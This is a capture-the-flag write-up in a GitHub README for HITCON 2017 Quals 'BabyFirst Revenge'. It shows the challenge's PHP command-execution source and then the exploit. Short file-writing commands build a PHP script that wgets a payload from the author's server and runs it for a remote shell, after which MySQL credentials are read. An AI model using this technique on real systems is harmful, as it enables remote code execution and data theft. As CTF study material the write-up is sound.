No description, website, or topics provided.
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md

README.md

BabyFirst-Revenge-HITCOIN-2017-QUALS

When we visite site, we see

Source Code:

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__); 

Here we can execute commands on server, which are <=5. There is an easy way how to solve this task with the help of \ symbol, but i choose the stupid one :D The main idea is to write a php script, which will execute shell command
wget myserverip
, and then run it with
sh index.html ( sh i*)

We will use ls command to write php code in file. But the main difficulty is that ls>>a will first make file a, and then prints it with other files. So i decided to name my file as %0d. Our task is to produce this code
<?php $a="abcdefghijklmnopqrstuvwxyz0123456789 ";$b=$a;$b[0]=$a[23];$b[1]=$a[7];.....;exec($b);

But we must take into account that we can write only 4 characters per time (>abcd); First we must create file %0d, we request http://52.199.204.34/?cmd=>%0d. Secondly we cant create <?php , but luckily <?= will also work. So we run

>\<?=
ls>>%0d
rm *=

Ater each file create and file writing, we must delete it in order not to write it again into %0d file. Then we continue create/write our 'gadgets'.

>\$a
ls>>%0d
rm *a

>=\"
ls>>%0d
rm =*

etc.

All request we can make with help of burpintruder with timeout between requests 1 second. After sending all requests we run

 php ?

index.html will be downloaded on target server. Than we run

. i*

and get remote shell. In the home directory was login/password for MySql database where flag was stored. Than we simply extract data from it and get the flag.